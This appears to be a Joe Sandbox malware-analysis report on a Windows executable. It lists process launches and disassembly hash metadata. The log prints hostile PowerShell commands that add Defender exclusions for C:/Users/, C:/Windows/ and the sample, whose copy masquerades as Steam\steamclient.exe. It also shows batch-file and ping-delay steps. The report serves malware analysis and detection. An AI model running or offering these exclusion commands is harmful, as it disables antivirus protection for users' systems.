                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:23
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:24
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:25
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Steam\steamclient.exe'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:26
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:27
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\qNdO4D18CF.exe'
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:28
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:29
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:30
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:31
                                                                  Start time:22:27:00
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:32
                                                                  Start time:22:27:02
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\XyagYCCOZX.bat"
                                                                  Imagebase:0x7ff77b170000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:33
                                                                  Start time:22:27:02
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:34
                                                                  Start time:22:27:04
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\chcp.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:chcp 65001
                                                                  Imagebase:0x7ff6c41f0000
                                                                  File size:14'848 bytes
                                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:35
                                                                  Start time:22:27:08
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\PING.EXE
                                                                  Wow64 process (32bit):false
                                                                  Commandline:ping -n 10 localhost
                                                                  Imagebase:0x7ff7618f0000
                                                                  File size:22'528 bytes
                                                                  MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:36
                                                                  Start time:22:27:10
                                                                  Start date:29/11/2024
                                                                  Path:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0x200000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 68%, ReversingLabs
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:38
                                                                  Start time:22:27:19
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                  Imagebase:0x7ff693ab0000
                                                                  File size:496'640 bytes
                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:42
                                                                  Start time:22:27:22
                                                                  Start date:29/11/2024
                                                                  Path:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\qNdO4D18CF.exe"
                                                                  Imagebase:0xd50000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:43
                                                                  Start time:22:27:22
                                                                  Start date:29/11/2024
                                                                  Path:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0xa10000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:45
                                                                  Start time:22:27:25
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0x7ff77b170000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:46
                                                                  Start time:22:27:25
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:47
                                                                  Start time:22:27:25
                                                                  Start date:29/11/2024
                                                                  Path:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0xf60000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:48
                                                                  Start time:22:27:32
                                                                  Start date:29/11/2024
                                                                  Path:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0xf90000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:49
                                                                  Start time:22:27:40
                                                                  Start date:29/11/2024
                                                                  Path:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\qNdO4D18CF.exe"
                                                                  Imagebase:0x700000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:50
                                                                  Start time:22:27:48
                                                                  Start date:29/11/2024
                                                                  Path:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0xb80000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:52
                                                                  Start time:22:27:53
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0x7ff77b170000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:53
                                                                  Start time:22:27:53
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:54
                                                                  Start time:22:27:53
                                                                  Start date:29/11/2024
                                                                  Path:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0x4a0000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:56
                                                                  Start time:22:27:57
                                                                  Start date:29/11/2024
                                                                  Path:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\qNdO4D18CF.exe"
                                                                  Imagebase:0xc30000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:57
                                                                  Start time:22:28:05
                                                                  Start date:29/11/2024
                                                                  Path:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files (x86)\Steam\steamclient.exe"
                                                                  Imagebase:0x260000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:58
                                                                  Start time:22:28:14
                                                                  Start date:29/11/2024
                                                                  Path:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\qNdO4D18CF.exe"
                                                                  Imagebase:0xe50000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:false
                                                                  Has administrator privileges:false
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:61
                                                                  Start time:22:28:19
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\Desktop\qNdO4D18CF.exe"
                                                                  Imagebase:0x7ff77b170000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:62
                                                                  Start time:22:28:19
                                                                  Start date:29/11/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:63
                                                                  Start time:22:28:19
                                                                  Start date:29/11/2024
                                                                  Path:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  Imagebase:0x840000
                                                                  File size:3'012'834 bytes
                                                                  MD5 hash:CE2EC4539435DFEAC7E246FE5565C521
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FFD9BC40B5C Relevance: 1.7, Strings: 1, Instructions: 402COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: d
                                                                    • API String ID: 0-2564639436
                                                                    • Opcode ID: f0f3667c3c42390e6511118c0e46c542629be55f01271ce894ff83b7b3b950f1
                                                                    • Instruction ID: 8d3e6f46ea7d8a983fdf07ca0b40b2aead9ef6237991bdc8f3a4b1e1e1875e73
                                                                    • Opcode Fuzzy Hash: f0f3667c3c42390e6511118c0e46c542629be55f01271ce894ff83b7b3b950f1
                                                                    • Instruction Fuzzy Hash: C5C1F130A18A098FD75CDF58D49297973E2FF99700B1045B9D88AC72ABDE35F9438B81
                                                                    Function 00007FFD9BC477D8 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 1c73970f1cbbc854cf1f2e07bd9b27538754d900d7845d1bdba6ceb4da5561ba
                                                                    • Instruction ID: 9b7b24c22a3125567f556427eec4de0b596d297e112efd6cf04edbf64227951a
                                                                    • Opcode Fuzzy Hash: 1c73970f1cbbc854cf1f2e07bd9b27538754d900d7845d1bdba6ceb4da5561ba
                                                                    • Instruction Fuzzy Hash: 62515B71E0964E8FDB59DFA8C4645BDBBB3FF59300F1540BAC01AE7292DA386A05CB50
                                                                    Function 00007FFD9BC4E308 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID: 0-3916222277
                                                                    • Opcode ID: 0663e7eb43dd9a377aab4b482388cd4e9dce7ebc829a16c6cec3eccf7dcda37c
                                                                    • Instruction ID: fc92940067aff1e3e86fed3202f349b72cc175cd016e5d2e9fa09f89e3af1c1b
                                                                    • Opcode Fuzzy Hash: 0663e7eb43dd9a377aab4b482388cd4e9dce7ebc829a16c6cec3eccf7dcda37c
                                                                    • Instruction Fuzzy Hash: 1D513B71F0964E8FEB6DDFA8C4615BDB7B2EF58300F1141BAD019E7296DA386A05CB40
                                                                    Function 00007FFD9BC4E57F Relevance: .4, Instructions: 423COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b649d1afcda2642de25ff9afd08b9bff04a05e6714f64926130c23a389ea76f
                                                                    • Instruction ID: 476f8916ea38263863852415ea68cf9cef9164f1a09d5b9fb15e33e951558b42
                                                                    • Opcode Fuzzy Hash: 1b649d1afcda2642de25ff9afd08b9bff04a05e6714f64926130c23a389ea76f
                                                                    • Instruction Fuzzy Hash: 3CF1D83071955A8FEB5CCF68C4E06B837A2FF55310B5545BDC44A8B69BCA38FA82CB40
                                                                    Function 00007FFD9BC48A91 Relevance: .4, Instructions: 407COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1332153dd7c27c7474049e7794ab176eff7b1f6c942aee1cbdef99391cf2de4c
                                                                    • Instruction ID: 5cc0278f10e29f2bcd3eaa8c4d1e8bc490d2f60d32afbacf947d001d4ea1c822
                                                                    • Opcode Fuzzy Hash: 1332153dd7c27c7474049e7794ab176eff7b1f6c942aee1cbdef99391cf2de4c
                                                                    • Instruction Fuzzy Hash: EAD1F130B0EB0A8FE379DF68D4A057977E2FF44340B15457EC48AD76E2DA29BA428741
                                                                    Function 00007FFD9BC47A6F Relevance: .3, Instructions: 332COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0cd9f09d35f1dc1a7d4fe687320a35b703c2f42342e249ad2282a36c8561b7c9
                                                                    • Instruction ID: e0b41fa0d5df2ec1da693500a46577f0b196f4f7727a18288d7c9229eb54cbc7
                                                                    • Opcode Fuzzy Hash: 0cd9f09d35f1dc1a7d4fe687320a35b703c2f42342e249ad2282a36c8561b7c9
                                                                    • Instruction Fuzzy Hash: 90C1D37061A54A8FEB1DCF68C0E05B937A3FF45310B5545BEC84A8B69BCA38FA41CB45
                                                                    Function 00007FFD9BC4E59F Relevance: .3, Instructions: 332COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d44a9fbffe5bad968457ac637e6cc07b859afd3e6c18311e02ae177b5bbfa89d
                                                                    • Instruction ID: 964857e42765efe5841fc0d382b374394f30a9dcd81f339c001995cd156b4cb0
                                                                    • Opcode Fuzzy Hash: d44a9fbffe5bad968457ac637e6cc07b859afd3e6c18311e02ae177b5bbfa89d
                                                                    • Instruction Fuzzy Hash: CFC1E63071955A8BEB5DCF68C0E05B93BA2FF45310B5645BDC85B8B69BC638FA42CB40
                                                                    Function 00007FFD9BC47302 Relevance: .3, Instructions: 329COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7d5c685a14c59ffb5823438e7b22bf6b0f5f5cb6397065fad8bb96261f52af70
                                                                    • Instruction ID: d211a64b486f5f237388536b5ff4da2b7a26522d23b1c7a89c5db0aae53098f0
                                                                    • Opcode Fuzzy Hash: 7d5c685a14c59ffb5823438e7b22bf6b0f5f5cb6397065fad8bb96261f52af70
                                                                    • Instruction Fuzzy Hash: 5BC1D870B09A4A8FE759DF78C0606B8B7A3FF54300F5541BAD44EC7A96DB28BA51C780
                                                                    Function 00007FFD9BC4DE8A Relevance: .3, Instructions: 311COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32543808523c94983ac671af5524865ae407ec6b4d5e8e13213fb9c90612bdca
                                                                    • Instruction ID: 99aa46b39664aa5376f0b191bae263a5780cb6795016e45063b4d9a587a80c0e
                                                                    • Opcode Fuzzy Hash: 32543808523c94983ac671af5524865ae407ec6b4d5e8e13213fb9c90612bdca
                                                                    • Instruction Fuzzy Hash: 4FB1A370B0EA4B4FE759DF7484A06A8B7A2FF15310F4641B9C04EC7A97DB24BA51C781
                                                                    Function 00007FFD9BC4B827 Relevance: .3, Instructions: 309COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2953946069.00007FFD9BC40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC40000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ffd9bc40000_qNdO4D18CF.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 19acdee2e73eaf5227345116572f572b031e549bf800d3ed3f0944eed0e3f79f
                                                                    • Instruction ID: 0dd71c7d3b3f4e866df78038d0c155a19fae1670aad005348a5e94ebbfc4262e
                                                                    • Opcode Fuzzy Hash: 19acdee2e73eaf5227345116572f572b031e549bf800d3ed3f0944eed0e3f79f
                                                                    • Instruction Fuzzy Hash: 4931D652F0F69F86F2395EF828750BC7A429F55724F1A06BAD48E860F3EC0C27496391
                                                                    Function 00007FFD9BC44CD7 Relevance: .3, Instructions: 304COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
